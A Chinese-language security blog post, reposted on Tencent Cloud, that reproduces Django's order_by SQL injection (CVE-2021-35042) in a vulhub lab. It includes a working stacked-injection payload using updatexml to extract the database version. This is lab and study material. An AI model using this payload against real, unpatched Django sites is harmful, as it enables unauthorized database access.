前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Django SQL注入漏洞(CVE-2021-35042)快速复现

Django SQL注入漏洞(CVE-2021-35042)快速复现

作者头像
网e渗透安全部
发布2022-12-01 15:33:25
9490
发布2022-12-01 15:33:25
举报
文章被收录于专栏:白安全组

前言:

Django在2021年7月1日发布了一个安全更新,修复了在QuerySet底下的order_by函数中存在的SQL注入漏洞。

正文:

这里使用vulhub,不会的可以参考前文,选择目录然后启动:

使用启动命令启动,然后我们访问一下

代码语言:javascript
复制
你的ip:8000/vuln/?order=1

我们构造一下order=-id,这样会产生id降序的结果

这里可以使用堆叠注入来完成。

我们构造语句:

代码语言:javascript
复制
?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@version)),1)%23

提交,其中vuln_collection是vuln应用下的模型Collection,这里语句是出现版本号。

代码语言:javascript
复制
http://192.168.119.136:8000/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23

这里成功出现,完成注入。

近期公众号运营时间会比较紧,作为个人公众号忙的时候就会发文较少,请大家见谅,可能会发一些比较简单的学习教程来填补空缺。大家多关注公众号的最新推文哦。

微信公众号:白安全组

网址:www.wangehacker.cn

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-10-28,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 白安全组 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 前言:
  • 正文:
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档